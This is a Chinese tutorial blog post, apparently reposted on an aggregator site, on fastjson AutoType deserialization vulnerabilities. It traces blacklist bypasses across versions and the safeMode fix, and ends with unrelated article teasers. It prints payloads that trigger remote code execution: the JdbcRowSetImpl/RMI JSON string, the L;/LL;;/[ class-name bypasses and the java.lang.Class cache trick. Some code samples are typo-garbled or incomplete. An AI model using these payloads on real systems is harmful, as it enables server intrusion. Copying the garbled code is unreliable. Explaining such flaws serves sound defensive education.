【深入之Java进阶篇】fastjson的反序列化漏洞(详解总结)

在这里插入图片描述

✔️ fastjson的反序列化漏

  • 1️⃣典型解析
  • 2️⃣拓展知识仓
    • 1️⃣AutoType
    • 2️⃣AutoType 有何错?
    • 3️⃣ 绕过checkAutotype,黑客与fastjson的博弈
    • 4️⃣autoType不开启也能被攻击?
    • 5️⃣利用异常进行攻击
    • 6️⃣AutoType 安全模式?

1️⃣典型解析


当我们使用fastjson进行序列化的时候,当一个类中包含了一个接口(或抽象类)的时候,会将子类型抹去,只保留接口(抽象类)的类型,使得反序列化时无法拿到原始类型。


那么为了解决这个问题,fastjson引入了AutoType,即在序列化的时候,把原始类型记录下来。


因为有了AutoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取 @type到内容,试图把JSON内容反序列化成这个对象,并且会调用这人类的setter方法。


那么这个特性就可能被利用,攻击者自己构造一个JSON字符串,并且使用@type 指定一个自己想要使用的攻击类库实现攻击。


举个栗子,黑客比较常用的攻击类库是com.sun.rowset.JdbcRowSetlmpl,这是sun官方提供的一个类库,这类的dataSourceName支持传入一个 RMI的源,当解析这个uri的时候,就会支持rmi远程调用,去指定的rmi地址中去调用方法。


而fastjson在反序列化时会调用目标类的setter方法,那么如果黑客在JdbcRowSetlmpl的dataSourceName中设置了一个想要执行的命令,那么就会导致很严重的后果。


如通过以下方式定一个JSON串,即可实现远程命令执行(在早期版本中,新版本中JdbcRowSetlmpl已经被加了黑名单)。


{“@type”:“com.sun.rowset.JdbcRowSetImpl” “dataSourceName”.“rmi: //localhost:1999/Exploit”,“autoCommit”:truel }


这就是所谓的远程命令执行漏洞,即利用漏洞入侵到目标服务器,通过服务器执行命令。


Demo1 :我们来看一段代码片段:

一个反序列化例子,包括处理可能的错误和异常,以及数据结构:


import com.alibaba.fastjson.JSON;  
import com.alibaba.fastjson.JSONArray;  
import com.alibaba.fastjson.JSONObject;  
import com.alibaba.fastjson.parser.ParserConfig;  
import com.alibaba.fastjson.parser.deserializer.ObjectDeserializer;  
import com.alibaba.fastjson.serializer.JSONSerializer;  
import com.alibaba.fastjson.serializer.ObjectSerializer;  import java.io.IOException;  
import java.io.OutputStream;  
import java.util.List;  /*** @author 昕宝爸爸爱编程* Demo1*/  
public class Main {  public static void main(String[] args) {  // 复杂的JSON字符串  String json = "{\"name\":\"苏西\",\"age\":20,\"address\":{\"city\":\"北京\",\"street\":\"长安街\"},\"friends\":[{\"name\":\"爱德蒙\",\"age\":25},{\"name\":\"羚羊夫人\",\"age\":30}]}";  // 自定义序列化/反序列化器,这里只是为了演示,实际上需要处理更复杂的逻辑  ParserConfig.getGlobalInstance().addAccept("com.example.");  ParserConfig customParserConfig = ParserConfig.getGlobalInstance();  customParserConfig.putDeserializer(User.class, new UserDeserializer());  customParserConfig.putSerializer(User.class, new UserSerializer());  // 尝试解析JSON字符串  try {  JSONObject jsonObject = JSON.parseObject(json, customParserConfig);  System.out.println("解析成功!");  System.out.println(jsonObject);  // 反序列化嵌套对象和数组  Address address = jsonObject.getObject("address", Address.class);  JSONArray friends = jsonObject.getJSONArray("friends");  List<User> userList = JSONArray.toJavaObject(friends, new TypeReference<List<User>>(){});  System.out.println("Address: " + address);  System.out.println("Friends:");  for (User friend : userList) {  System.out.println(friend);  }  } catch (Exception e) {  System.err.println("解析JSON出错: " + e.getMessage());  }  }  
}  class User {  private String name;  private int age;  private Address address;  // getters and setters...   省略掉了哦
}  class Address {  private String city;  private String street;  // getters and setters...   省略掉了哦
}  class UserDeserializer implements ObjectDeserializer {  @Override  public Object deserialze(JSONParser parser, Type type) {  JSONObject jsonObject = parser.getJSONObject();  return new User(jsonObject.getString("name"), jsonObject.getIntValue("age"), new Address(jsonObject.getString("city"), jsonObject.getString("street")));  }  
}  class UserSerializer implements ObjectSerializer {  @Override  public void write(JSONSerializer serializer, Object object, Object fieldName, Type fieldType) throws IOException {  User user = (User) object;  serializer.write(user); // 这里假设User类实现了Serializable接口,并且有一个合理的默认序列化行为。  }  
}

这个Demo1主要展示了如何使用fastjson库进行JSON的序列化和反序列化,特别是如何处理嵌套对象和数组。同时,也展示了如何自定义反序列化和序列化过程。

2️⃣拓展知识仓


1️⃣AutoType


fastjson的主要功能就是将Java Bean序列化成JSON字符,这样得到字符串之后就可以通过数据库等方式进行持久化了。


但是,fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制,而是自定义了一套机制。


其实,对于JSON框架来说,想要把一个Java对象转换成字符串,可以有两种选择:

1 . 基于属性
2 . 基于setter/getter


而我们所常用的JSON序列化框架中,FastJson和jackson在把对象序列化成json字符审的时候,是通过遍历出该类中的所有getter方法进行的。Gson并不是这么做的,他是通过反射遍历该类中的所有属性,并把其值序列化成json。


假设我们有以下一个Java类:


class Store {private String name;private Fruit fruit;public string getName() {return name;}public void setName(String name) {this .name = name ;}public Fruit getFruit() {return fruit;}public void setFruit(Fruit fruit) {this.fruit = fruit;}}interface Fruit {
}
class Apple implements Fruit {private BigDecimal price;//省略 setter/getter、toString等
}

当我们要对他进行序列化的时候,fastjson会扫描其中的getter方法,即找到getName和getFruit,这时候就会将name和fruit两个字段的值序列化到JSON字符串中。


那么问题来了,我们上面的定义的Fruit只是一个接口,序列化的时候fastjson能够把属性值正确序列化出来吗?如果可以的话,那么反序列化的时候,fastjson会把这个fruit反序列化成什么类型呢?


我们尝试着验证一下,基于(fastison v 1.2.68):


Store store = new store();
store.setName("爱德蒙");
Apple apple = new Apple();
apple.setPrice(new BigDecimal(0.5));
store.setFruit(apple);
string isonstring = ]SON.to]sONstring(store);System.out.println("to]SONString : " + jsonString);

以上代码比较简单,我们创建了一个store,为他指定了名称,并且创建了一个Fruit的子类型Apple,然后将这个store使用 JSON.toJSONString 进行序列化,可以得到以下JSON内容:


toJSONString : {“fruit”:{“price”:0.51},“name”:“爱德蒙”}


那么,这个fruit的类型到底是什么呢,能否反序列化成Apple呢? 我们再来执行以下代码:


Store newstore = JsON.parseObiect(isonstring, Store.class);
System.out.println("parseObject : " + newStore);
Apple newApple = (Apple)newStore.getFruit();
System.out.println("getFruit : " + newApple);

执行结果如下:


在这里插入图片描述

可以看到,在将store反序列化之后,我们尝试将Fruit转换成Apple,但是抛出了异常,尝试直接转换成Fruit则不会报错,如:


Fruit newFruit = newStore.getFruit();
System.out.println("getFruit :" + newFruit);

以上现象,我们知道,当一个类中包含了一个接口(或抽象类)的时候,在使用fastjson进行序列化的时候,会将子类型抹去,只保留接口 (抽象类)的类型,使得反序列化时无法拿到原始类型。


那么有什么办法解决这个问题呢,fastjson引入了AutoType,即在序列化的时候,把原始类型记录下来.使用方法是通过 SerializerFeature.WriteClassName 进行标记,即将上述代码中的:


String jsonString = JSON.toJSONString(store);

修改为:


String jsonString = JSON.toJSONString(store,SerializerFeature.WriteClasslame);

即可,以上代码,输出结果如下:


在这里插入图片描述

可以看到,使用 SerializerFeature.WriteClassName 进行标记后,JSON字符串中多出来一个@Type字段,标注了类对应的原始类型,方便在反序列化的时候定位到具体类型。


如上,将序列化后的字符串在反序列化,既可以顺利的拿到一个Apple类型,整体输出内容:


在这里插入图片描述

这就是AutoType,以及fastison中引入AutoType的原因。


但是,也正是这个特性,因为在功能设计之初在安全方面考虑的不够周全,也给后续fastjson使用者带来了无尽的痛苦。


2️⃣AutoType 有何错?


因为有了autoType功能,那么fastjson在对JSON字符审进行反序列化的时候,就会读取 @type 到内容,试图把JSON内容反序列化成这人对象,并目会调用这个类的setter方法。


那么就可以利用这个特性,自己构造一个JSON字符串,并且使用 @type 指定一个自己想要使用的攻击类库。


举个例子,黑客比较常用的攻击类库是 com.sun.rowset.JdbcRowSetImpl ,这是sun官方提供的一个类库,这个类的dataSourceName支持传入一个rmi的源,当解析这个uri的时候,就会支持rmi远程调用,去指定的rmi地址中去调用方法。


而fastjson在反序列化时会调用目标类的setter方法,那么如果黑客在JdbcRowSetlmpl的dataSourceName中设置了一个想要执行的命令,那么就会导致很严重的后果。

如通过以下方式定一个JSON串,即可实现远程命令执行(在早期版本中,新版本中JdbcRowSetlmpl已经被加了黑名单)


在这里插入图片描述

这就是所谓的远程命令执行漏洞,即利用漏洞入侵到目标服务器,通过服务器执行命令


在早期的fastison版本中(v1.2.25 之前),因为AutoType是默认开启的,并且也没有什么限制,可以说是裸着的。

从v1.2.25开始,fastjson默认关闭了autotype支持,并且加入了checkAutotype,加入了黑名单+白名单来防御autotype开启的情况。

但是,也是从这个时候开始,黑客和fastjson作者之间的博弈就开始了。

因为fastjson默认关闭了autotype支持,并且做了黑白名单的校验,所以攻击方向就转变成了 “如何绕过checkAutotype” 。


下面就来细数一下各个版本的fastjson中存在的漏洞以及攻击原理,**由于篇幅限制,这里并不会讲解的特别细节如果大家感兴趣我后面可以单独写一篇文章讲一讲细节。**下面的内容主要是提供一些思路,目的是说明写代码的时候注意安全性的重要性。


3️⃣ 绕过checkAutotype,黑客与fastjson的博弈


在fastjson v1.2.41 之前,在checkAutotype的代码中,会先进行黑白名单的过滤,如果要反序列化的类不在黑广名单中,那么才会对目标类进行反序列化。


但是在加载的过程中,fastison有一段特殊的处理,那就是在具体加载类的时候会去掉ClassName前后的 L 和 ; ,形们 Lcom.lang.Thread; 。


在这里插入图片描述

而黑白名单又是通过startWith检测的,那么黑客只要在自己想要使用的攻击类库前后加上 L 和 ; 就可以绕过黑白名单的检查了,也不耽误被fastjson正常加载。


Lcom.sun.rowset.JdbcRowSetImpl;,会先通过白名单校验,然后fastison在加载类的时候会去掉前后的L; 变成了 com.sun.rowset.JdbcRowSetlmpl


为了避免被攻击,在之后的 v1.2.42版本中,在进行黑白名单检测的时候,fastjson先判断目标类的类名的前后是不是 L,如果是的话,就截取掉前后的 L; 再进行黑白名单的校验。


看似解决了问题,但是黑客发现了这个规则之后,就在攻击时在目标类前后双写 LL;; ,这样再被截取之后还是可以绕过检测。如 LLcom.sun.rowset.JdbcRowSetImpl;;


魔高一尺,道高一丈。在v1.2.43中,fastison这次在黑白名单判断之前,增加了一个是否以 LL 末开头的判断如果目标类以 LL 开头,那么就直接抛异常,于是就又短暂的修复了这个漏洞。


黑客在 L和 ;,这里走不通了,于是想办法从其他地方下手,因为fastjson在加载类的时候,不只对 L 和,这样的类进行特殊处理,还对 也被特殊处理了。


同样的攻击手段,在目标类前面添加 [ ,v1.2.43以前的所有版本又沦陷了。


于是,在v1.2.44版本中,fastjson的作者做了更加严格的要求,只要目标类以[ 开头或者以 ,结尾,都直接抛异常。也就解决了 v1.2.43及历史版本中发现的bug。


在之后的几个版本中,黑客的主要的攻击方式就是绕过黑名单了,而fastjson也在不断的完善自己的黑名单。


4️⃣autoType不开启也能被攻击?


但是好景不长,在升级到 v1.2.47 版本时,黑客再次找到了办法来攻击。而且这个攻击只有在autoType关闭的的候才生效。

请添加图片描述
是不是很奇怪,autoType不开启反而会被攻击?


因为在fastjson中有一个全局缓存,在类加载的时候,如果autotype没开启,会先尝试从缓存中获取类,如果缓存中有,则直接返回。黑客正是利用这里机制进行了攻击。


黑客先想办法把一个类加到缓存中,然后再次执行的时候就可以绕过黑白名单检测了,多么聪明的手段。

首先想要把一个黑名单中的类加到缓存中,需要使用一个不在黑名单中的类,这个类就是 java.lang.class

java.lang.class 类对应的deserializer为MiscCodec,反序列化时会取JSON字符串中的val值并加载这个val对应的类。

如果fastjson cache为true,就会缓存这个val 对应的 class 到全局缓存中

如果再次加载 val 名称的类,并且autotype没开启,下一步就是会尝试从全局缓存中获取这个 class,进而进行攻击。

所以,黑客只需要把攻击类伪装以下就行了,如下格式:

{“@type”:“java.lang.Class”,“val”: “com.sun,rowset.JdbcRowSetImpl”}


于是在v1.2.48中,fastjson修复了这个bug,在MiscCodec中,处理Class类的地方,设置了fastjson cache为false,这样攻击类就不会被缓存了,也就不会被获取到了。


在之后的多个版本中,黑客与fastjson又继续一直都在绕过黑名单、添加黑名单中进行周旋。


直到后来,黑客在 v1.2.68之前的版本中又发现了一个新的漏洞利用方式。


5️⃣利用异常进行攻击


在fastjson中,如果,@type 指定的类为 Throwable 的子类,那对应的反序列化处理类就会使用到ThrowapleDeserializer


而在ThrowableDeserializer#deserialze的方法中,当有一个字段的key也是 @type时,就会把这个 value 当做类名,然后进行一次 checkAutoType 检测。


并且指定了expectClass为Throwable.class,但是在checkAutoType中,有这样一约定,那就是如果指定了expectClass,那么也会通过校验


在这里插入图片描述

因为fastison在反序列化的时候会尝试执行里面的getter方法,而Exception类中都有一个getMessage方法。


黑客只需要自定义一个异常,并目重写写其getMessage就达到了攻击的目的。


这个漏洞就是6月份全网疯传的那个”严重漏洞”,使得很多开发者不得不升级到新版本


这个漏洞在 v1.2.69中被修复,主要修复方式是对于需要过滤掉的expectClass进行了修改,新增了4个新的类,并且将原来的Class类型的判断修改为hash的判断。


其实,根据fastjson的官方文档介绍,即使不升级到新版,在v1.2.68中也可以规避掉这个问题,那就是使用safeMode


6️⃣AutoType 安全模式?


可以看到,这些漏洞的利用几乎都是围绕AutoType来的,于是,在 v1.2.68版本中,引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可一定程度上缓解反序列化Gadgets类变种攻击。


设置了safeMode后,@type 字段不再生效,即当解析形@type":"comjava.class"的JSON串时,将不再反序列化出对应的类。


开启safeMode方式如下

ParserConfig.getGlobalInstance().setSafeMode(true);


如在本文的最开始的代码示例中,使用以上代码开启safeMode模式,执行代码,会得到以下异常:


在这里插入图片描述

但是值得注意的是,使用这个功能,fastjson会直接禁用autoType功能,即在checkAutoType方法中,直接抛出个异常。


在这里插入图片描述

开发者可以将自己项目中使用的fastjson升级到最新版,并且如果代码中不需要用到Autolype的话,可以考虑使用safeMode,但是要评估下对历史代码的影影响。


因为fastjson自己定义了序列化工具类,并且使用asm技术避免反射、使用缓存、并且做了很多算法优化等方式,大大提升了序列化及反序列化的效率。


看一个对比表:

在这里插入图片描述

当然,快的同时也带来一些安全性问题,这是不可否认的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/588698.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

redis—List列表

目录 前言 1.常见命令 2.使用场景 前言 列表类型是用来存储多个有序的字符串&#xff0c;如图2-19所示&#xff0c;a、b、C、d、e五个元素从左到右组成 了一个有序的列表&#xff0c;列表中的每个字符串称为元素(element) &#xff0c;一个列表最多可以存储2^32 - 1 个元素…

李宏毅 自然语言处理(Voice Conversion) 笔记

前一章笔记&#xff1a;李宏毅 自然语言处理&#xff08;Speech Recognition&#xff09; 笔记 引入 什么是voice conversion&#xff1f; 输入一段声音&#xff0c;输出另一段声音&#xff0c;我们希望这两端声音&#xff1a;内容一样&#xff0c;其他方面不一样&#xff08…

每日一题——LeetCode977

方法一 个人方法&#xff1a; 以示例1为例&#xff1a;把[-4,-1,0,3,10] 中n<0的元素拆分出来&#xff0c;把他们的平方从小到大放入arr数组&#xff0c;则arr[0,1,16] ,那数组就还剩[3,10] 对于剩下的元素&#xff0c;看arr里面有没有比他们平方更小的元素先放入res数组&…

vue3-12

需求是用户如果登录了&#xff0c;可以访问主页&#xff0c;如果没有登录&#xff0c;则不能访问主页&#xff0c;随后跳转到登录界面&#xff0c;让用户登录 实现思路&#xff0c;在用户登录之前做一个检查&#xff0c;如果登录了&#xff0c;则token是存在的&#xff0c;则放…

回顾2023,我的编程学习之旅

文章目录 前言我与C语言初识C语言简易扫雷游戏二进制的美妙神奇的指针强大的结构体灵活的动态内存管理总结 我与竞赛我与CSDN结语 前言 6月8号高考结束了&#xff0c;虽然还没有出分&#xff0c;但是也大致规划好自己想学什么专业了&#xff0c;没错就是计算机&#xff0c;出分…

PyTorch中常用的工具(4)Visdom

文章目录 前言3.2 Visdom 前言 在训练神经网络的过程中需要用到很多的工具&#xff0c;最重要的是数据处理、可视化和GPU加速。本章主要介绍PyTorch在这些方面常用的工具模块&#xff0c;合理使用这些工具可以极大地提高编程效率。 由于内容较多&#xff0c;本文分成了五篇文…

影视后期: PR调色处理,调色工具面板介绍

写在前面 整理一些影视后期的相关笔记博文为 Pr 调色处理&#xff0c;涉及调色工具面板简单认知包括 lumetri 颜色和范围面板理解不足小伙伴帮忙指正 元旦快乐哦 _ 名词解释 饱和度 是指色彩的鲜艳程度&#xff0c;也被称为色彩的纯度。具体来说&#xff0c;它表示色相中灰色…

从马尔可夫奖励过程到马尔可夫决策到强化学习【01/2】

一、说明 关于马尔可夫过程&#xff0c;如何将马尔可夫决策转化成决策依据&#xff0c;这里介绍的基本的思想路径&#xff0c;为读者将来设计和应用决策模型提供理论上的参考。 这是了解强化学习的一系列基础文章的后续文章。如果您有兴趣了解强化学习&#xff0c;请查看此处。…

huggingface的tokenizer解读

文章目录 前言一、huggingface的tokenizer含义1、含义2、整体概括 二、加载lmsys/vicuna-7b-v1.5模型的tokenizer三、调用tokernizer方法四、字符串的tokens应用1、tokenizer应用2、tokenizer进行token分词(tokenizer.tokenize)3、tokens转模型识别ids(tokenizer.convert_token…

STM32F407-14.3.10-表73具有有断路功能的互补通道OCx和OCxN的输出控制位-00x10

如上表所示&#xff0c;MOE0&#xff0c;OSSI0&#xff0c;CCxE1&#xff0c;CCxNE0时&#xff0c;OCx与OCxN的输出状态取决于GPIO端口上下拉状态。 ---------------------------------------------------------------------------------------------------------------------…

Python 中的运算符介绍(1)

算数运算符 常见的% 、//、/ 用法 赋值运算符 赋值运算&#xff1a;将等号右边赋值给等号左边 常见场景&#xff1a; 比较运算符 代码解析&#xff1a; 逻辑运算符 位运算符&#xff08;了解&#xff09; 三目运算符 身份证运算符 成员运算符

考研后SpringBoot复习2—容器底层相关注解

考研后SpringBoot复习2 SpringBoot底层注解学习 与容器功能相关的注解与springboot的底层原理密切相关 组件添加注解configuration Spring Ioc容器部分回顾 包括在配置中注册&#xff0c;开启包扫描和注解驱动开发等需要在进行重新的学习回顾 实例 package com.dzu.boot;imp…

Python装饰器的专业解释

装饰器&#xff0c;其实是用到了闭包的原理来进行操作的。 单个装饰器&#xff1a; 以下是一个简单的例子&#xff1a; def outer(func):print("OUTER enter ...")def wrapper(*args, **kwargs):print("调用之前......")result func(*args, **kwargs)p…

【Vue2+3入门到实战】(17)VUE之VueCli脚手架自定认创建项目、ESlint代码规范与修复、 ESlint自动修正插件的使用 详细示例

目录 一、本节内容二、VueCli 自定义创建项目三、ESlint代码规范及手动修复1.JavaScript Standard Style 规范说明2.代码规范错误3.手动修正 四、通过eslint插件来实现自动修正 一、本节内容 VueCli脚手架自定认创建项目ESlint代码规范与修复ESlint自动修正插件 二、VueCli 自…

FA模板制作流程

1、FA模板制作的流程&#xff08;完整复制模板制作&#xff09; 总结&#xff1a; FA完整复制云桌面模板流程&#xff1a; 1、安装一个全新的Windows&#xff0c;挂载并安装tools 2、关闭防火墙、启动administrator本地超管用户 3、挂载FusionAccess_WindowsDesktop_Instal…

C/C++面向对象(OOP)编程-回调函数详解(回调函数、异步编程、函数指针、)

本文主要介绍回调函数的使用&#xff0c;包括函数指针、异步回调编程、主要通过详细的例子来指导在异步编程和事件编程中如何使用回调函数来实现。 &#x1f3ac;个人简介&#xff1a;一个全栈工程师的升级之路&#xff01; &#x1f4cb;个人专栏&#xff1a;C/C精进之路 &…

黑马程序员SSM框架-SpringBoot

视频连接&#xff1a;SpringBoot-01-SpringBoot工程入门案例开发步骤_哔哩哔哩_bilibili SpringBoot简介 入门程序 也可以基于官网创建项目。 SpringBoot项目快速启动 下面的插件将项目运行所需的依赖jar包全部加入到了最终运行的jar包中&#xff0c;并将入口程序指定。 Spri…

【网络面试(2)】DNS原理-域名和IP地址的查询转换

从上一篇博客我们得知浏览器是如何生成了HTTP消息了&#xff0c;但是浏览器作为应用程序&#xff0c;是不具备向网络中发送请求的能力&#xff0c;而是需要委托给操作系统的内核协议栈来发送请求。在委托协议栈之前&#xff0c;浏览器还要做的一件事情就是将域名转换为IP地址。…

java进阶(三)

IO与网络编程 3 输入输出流IO3.1 基础定义3.2 IO框架3.3 读取字节输入流-InputStream3.3.1 InputStream.read3.3.2 FileInputStream类说明 3.4读取字符输入流Reader3.4.1 Reader.read3.4.2 FileReader类说明 3.5 字节输出流OutputStream3.5.1 OutputStream.write3.5.2 FileOutp…

nodejs微信小程序+python+PHP特困救助供养信息管理系统-计算机毕业设计推荐

目 录 摘 要 I ABSTRACT II 目 录 II 第1章 绪论 1 1.1背景及意义 1 1.2 国内外研究概况 1 1.3 研究的内容 1 第2章 相关技术 3 2.1 nodejs简介 4 2.2 express框架介绍 6 2.4 MySQL数据库 4 第3章 系统分析 5 3.1 需求分析 5 3.2 系统可行性分析 5 3.2.1技术可行性&#xff1a;…